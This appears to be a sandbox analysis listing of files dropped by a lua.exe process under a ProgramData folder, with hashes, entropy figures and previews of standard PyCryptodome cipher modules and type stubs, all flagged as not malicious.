Preview:	from typing import Union, Tuple, Optional, Dict....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....AESMode = int....MODE_ECB: AESMode..MODE_CBC: AESMode..MODE_CFB: AESMode..MODE_OFB: AESMode..MODE_CTR: AESMode..MODE_OPENPGP: AESMode..MODE_CCM: AESMode..MODE_EAX: AESMode..MODE_GCM: AESMode..MODE_SIV: AESMode..MODE_OCB: AESMode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: AESMode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ARC2.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7185
Entropy (8bit):	4.784592068528299
Encrypted:	false
SSDEEP:	192:dHQHv8gflA2jSkmRFmynD/t4AKdRYotKI:te8g9A82jnD/t4hjYotKI
MD5:	274E46A9AE6D3E092B48A7D1AB3F0D6D
SHA1:	FB5A62548FB3876FF73319D3C92565B64CEA3E69
SHA-256:	CF808C3951F83D9E86799E02A564661D6C372216656DC5D40FD9E19B21D84A53
SHA-512:	D9850D167368AE4B901512D5B3111EF6858E643FCD4DCA7EE2A263ADBB621D3D9729D124A9A9570EB250D63034734663B16770ACC5B2D4F1CEEFB3E47EACD8B3
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ARC2.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	989
Entropy (8bit):	4.915216854898192
Encrypted:	false
SSDEEP:	24:1RENp+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NMT3Do0CLBILBgLB3zb1DoeRH5:Kp+O+O+s+8+s+w+Hx9eTkB2BOBjbFoev
MD5:	8E4682ECCDE917F5B5D1D512D15F00DE
SHA1:	72583A3700EE8B0A5511A33BE22A39F27C53B2FA
SHA-256:	E443624020DAF9F25901D57AB3E563BBD5673DD526C6286155A394A3ECDB3CDC
SHA-512:	3F07163F52A81BF40EC86BA110BDF37FF75799D5007A1354BCFC3068890D87DFF74726BCD0100C536A69CF2E0DB03776985854012964894AD43C9D95BE2F7984
Malicious:	false
Preview:	from typing import Union, Dict, Iterable....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: Iterable[int]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ARC4.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5289
Entropy (8bit):	4.728261417917464
Encrypted:	false
SSDEEP:	96:doFQHvo7HtdIUoeGgR2uvi/jqEyExPhO3i:deQHvbGR2uvi/j9xZO3i
MD5:	712918E363F6431E6814BA371E8024D1
SHA1:	E2D183660491B893C11310FDB7B84D2C75E5B464
SHA-256:	8E7C7189986EAAD85A5CC29BF9FEA819E5EB144A449BDCFEE66A5D6FA9738909
SHA-512:	299D6815DC6ACC5B88767A3E2574FB8D9F29713C35481513A9F678DE0A2914D6C34FD1F9E1E385CC1E8A0AC41FEF0A4B89A5A71F141F1C699CA0B156D410EAD5
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ARC4.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	447
Entropy (8bit):	4.889753450972529
Encrypted:	false
SSDEEP:	12:1REYBdvIY3lrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUT3lrQFeBFAfnRe+RGorVYO
MD5:	B7606D8DA70ED43039C9ED701FD0095D
SHA1:	28BC5F28009E12F124B621D33F501774A412708B
SHA-256:	3EAB7AEC8BC703309AC4EF1BA54A72C27CCAADC4CC1766FDE956F45417834C7F
SHA-512:	2AEC35D69A535CEA2F045FA7B364D1437F976B48C90B698A5AA8127E603E0B91142C8832A8B9BA2300D252AF647A4B255EBFAB0E6408FBE28FBA920983A5ACBF
Malicious:	false
Preview:	from typing import Any, Union, Iterable....Buffer = Union[bytes, bytearray, memoryview]....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, args: Any, *kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\Blowfish.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6123
Entropy (8bit):	4.915681807073174
Encrypted:	false
SSDEEP:	96:doFQHvofgiwZAEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogySniiSYkGIOmJt4A/RYotKj
MD5:	C34B138E93044278085C0172B171945A
SHA1:	058CCA453B61AD12F6007A84E1626371EA2E5855
SHA-256:	9E71714F41AD4FC6499B83FF0199D1FF75D73D551A740CFFDC077D13AD930EDF
SHA-512:	39CA5D7161933F6AB86D14877E8E089D3BD11561494079B99C7B56209B074FAE50D31A8BA25760C3309E36BBB216A818ED49084E9479F0B47FEFC4F55BF2EC51
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\Blowfish.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1025
Entropy (8bit):	4.902401523272142
Encrypted:	false
SSDEEP:	24:1RENp+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrFWT3DoRLBILBgLB3zb1DoeRHYO:Kp+O+O+s+8+s+w+DtrFGT8B2BOBjbFoa
MD5:	B59A12EAA3B18B87950C46108FE1110D
SHA1:	8B9A762132F14FD18215E0063037C4D571BE612C
SHA-256:	F2A2D18B01A95549E8017E2EAD0C8BDC84A0CCB5BC6EBB77AA58CCDA4EAA5284
SHA-512:	15D917EF92B4BD4408B87F3F0D74F057CC49D4F282C6648BE6AFC114312CD5924ADC08C1C29FF3C33DD8E4AFFF6436BFCB0F2C05BF3F46E0E9E35908375E6FD8
Malicious:	false
Preview:	from typing import Union, Dict, Iterable....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\CAST.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6230
Entropy (8bit):	4.846211484152016
Encrypted:	false
SSDEEP:	192:d2QHvVgdaKSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgd8n549aW75t4rYotKw
MD5:	1166B892369E19B4220BBC069D9CCABC
SHA1:	F8FFFEFAD392A8D7F79CD644B4D21D771D7458EF
SHA-256:	2E59E547BAF132E8553FC76E9AE2151B48C0610483E54130B0B6262A03F95903
SHA-512:	B99AA9B0F448B24BCF56DEB0BB30B948C1FBAE91692A78A291AE30A1935E4C74204A24925573E3E60777B5033CF748FD7C0D4BEE3E79BCF3D8D5FBBB19E195CE
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\CAST.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.912967609127088
Encrypted:	false
SSDEEP:	24:1RENp+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIT3DossmLBILBgLB3zb1DoC:Kp+O+O+s+8+s+w+TQieL/tixsDOMTY8n
MD5:	2D79FAE12F658BFA7000C37FFD2CF3FE
SHA1:	6C3E477FDD9C9AFA7688778B4FC0FD1786FC8EEA
SHA-256:	DB0E805140976970D5F0FBCA834B6293DF12A3635E67FF04FDC91565C1C6D0B9
SHA-512:	2711197F8D95ED111BF94CDD78F6D33C24ADBA0A8BD8B115EBFF2644DE85580B08AFF9779EA54426A537900FACB433FD7841609AAE9508EC7E9E2C5B831073CF
Malicious:	false
Preview:	from typing import Union, Dict, Iterable....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: CASTMode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size : Iterable[int]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ChaCha20.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11047
Entropy (8bit):	4.624831308070561
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IcwYkUlRGziNzvPpDkzBj/gkcTUjwzgLMZKPOYbCCtrBUpt:0rskrs9VqxwwlCihPix/g5F6PPOqBUt
MD5:	CF6AECA596303373D68A1397189EB7C5
SHA1:	69B657DAF5D5C833175DEF3EB52F15C36DCB4151
SHA-256:	068AE8765DF74153E0D75FE40E422618D9FE4A5016FAAC5D60D1663ABD225B82
SHA-512:	61E705C1448C135FA7EA5765E37730242DC30FE9B9216554AFA6004C92696707007DD827EA54210A31E2A40A9ED455EEF04738D2EADB8AA375D6EBB105B1AFF3
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ChaCha20.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.825665053518191
Encrypted:	false
SSDEEP:	24:1RE2lT3D/sxQUADnRNne3yFnR3Fne3xodLkxVYBy:rlTe/4vesLeho++w
MD5:	D10B06369227E9D35FF054F98AD330E4
SHA1:	F132BD147812586FFD64950065646478CB5756CF
SHA-256:	D8B74845D5EA435B0441BA413B7D84270BBA29F6BDE288A7655BB37C2EC1C821
SHA-512:	640C6BD95539FF187DBC0218C7204BBB0EDCA412FDBB082BB1AB364E117327B15B1FA1B7CBC5B0E04042427E023448D5ED07C911A0F1D8CEFD0A577B6EAAB342
Malicious:	false
Preview:	from typing import Union, overload....Buffer = Union[bytes, bytearray, memoryview]....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Buffer = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ChaCha20_Poly1305.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11865
Entropy (8bit):	4.94280357870418
Encrypted:	false
SSDEEP:	192:0qrskrs9t3q/IIJOqiEij/Rnae9XR18psd6agIoK2Xt:zrskrs9VqViTd/XR1iWh6t
MD5:	23161FB81EF4F8D13DBDBC3414BBEDC8
SHA1:	CF34274D92FF90154A030F35A082838FE4E0179A
SHA-256:	F9AC5471B762339307B3E64E2D3B0E5F0822842053B3CD7327DFB9FE2B6F57AC
SHA-512:	B7E21389B20E380A8194BB7C4997D3620D10C7A2ECB7AE91FFB10AC62AF810D3A711196B7E753795DE12AC63C9D462AFFAB7CE02FA7D7D58D9CDEE06290F4EDB
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\ChaCha20_Poly1305.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	4.841914448132316
Encrypted:	false
SSDEEP:	24:1RElQlT3yUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLvVYBy:RlCUJvesLeiwanoov+w
MD5:	09F38B40B711EE9B54DBD90F335FF888
SHA1:	024DE17D51BF6607EA8F62097A3D994C4965DFFA
SHA-256:	22200435563CDA393FAE4C8183FEA5ED4E20BE7A193BC51360DF06B5D3B253EB
SHA-512:	5C1878BC3496CD82492F6DC1BB07B953430EE1DC13F2EB5202D9C98334E8255DB7422199339C1CA82C4308584946CEC768C0A38599D5D2A107C9050EEE528495
Malicious:	false
Preview:	from typing import Union, Tuple, overload....Buffer = Union[bytes, bytearray, memoryview]....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\DES.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6105
Entropy (8bit):	4.865470874769693
Encrypted:	false
SSDEEP:	96:dOFQHvotgiwHCXjG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gUqC5K0kmIct4NZRYotK0
MD5:	1B182D8CD016EDC5F53015A433BE05D5
SHA1:	531C8DB19CDA7EDEE5B45B83D0C309F4EA65C1D5
SHA-256:	BAE52D7A7D2CD509D466156DC2878D7E4194BB304A8CB555F353EC00108C9186
SHA-512:	3D08AF59AA18156E5086E061BBDDD3E7E321A5EB98B1EFE4CCE56D7CA668CDFD167ECEF8F42A66FB6450797F21A6A21841FE24A606B0F1F959375CA6F4279227
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\DES.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	970
Entropy (8bit):	4.869474362744328
Encrypted:	false
SSDEEP:	24:1RENp+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IT3DoumLBILBgLB3zb1DoeRz:Kp+O+O+s+8+s+w+H7XcTGB2BOBjbFoe9
MD5:	46D2C3B532E007A92F046EB910D8156D
SHA1:	55C8BE17E79C1DF4AD8BA1EADA179C9CDA16CE3C
SHA-256:	1304BBE274BBCBBBD94B68E1F3067ECBFC8034C73BEA624AD9C23B1B66F5F4A3
SHA-512:	1BB5BABD290BD484C5BDA829ECB1D6AFABBC1DD65425DA4995052C6904E6B0A5EA890DD7177E1EE55628FA8562CA5799889A7F053B4C7BA03D7DD05618C425C9
Malicious:	false
Preview:	from typing import Union, Dict, Iterable....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: DESMode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\DES3.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7112
Entropy (8bit):	4.8687640980714715
Encrypted:	false
SSDEEP:	192:dKQHvCgthz1GPoiRxwKIUK9t4A1zRYotKa:YeCgHAhRn9K9t42NYotKa
MD5:	44204A7CBBF99E82EB31B7F746B43AB3
SHA1:	4589336CF1A1D1E74DAAA10E87C898DD804DB7F8
SHA-256:	70D9B525599D85146924EF8DBDF0980C42A03F4FBB2D01A2CADBF7ED2D43CD93
SHA-512:	1D0403F3BCDF6AE8A7A7D2FE339112B7BE604EA1D103388547760FF73CBBC7DF5106CF6D702A6134CC4C51A836FEB3ED42AC0BFDE90A46E67F684ECCA3DDF4F6
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\DES3.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	4.947542072808077
Encrypted:	false
SSDEEP:	24:1REN3+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOktT3DoCLBILBgLB3zb1DoeRHYX:K3+O+O+s+8+s+w+4GxOkdThB2BOBjbFu
MD5:	1BA97BEDA3A1C5C4F1F1E822DCDAE52A
SHA1:	9490B1B328E95BDC5D210E69C0FAAC82A6ECA82A
SHA-256:	1CEC66A6EA369FB78342893C8F0F6A1A05D7135371E12183B87A71A9C84C11D0
SHA-512:	1EE1CA22E0C371DB6BD92C9C87056672F2CA9047AA7A39B19AD4B80221C144255D81EACDFF3152290A1BDF708DDAA8EC927DE0759A5C41256BC0AD84D81473FB
Malicious:	false
Preview:	from typing import Union, Dict, Tuple....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: DES3Mode,.. iv : Buffer = ...,.. IV : Buffer = ...,.. nonce : Buffer = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......bl

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\PKCS1_OAEP.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9063
Entropy (8bit):	4.802799776084508
Encrypted:	false
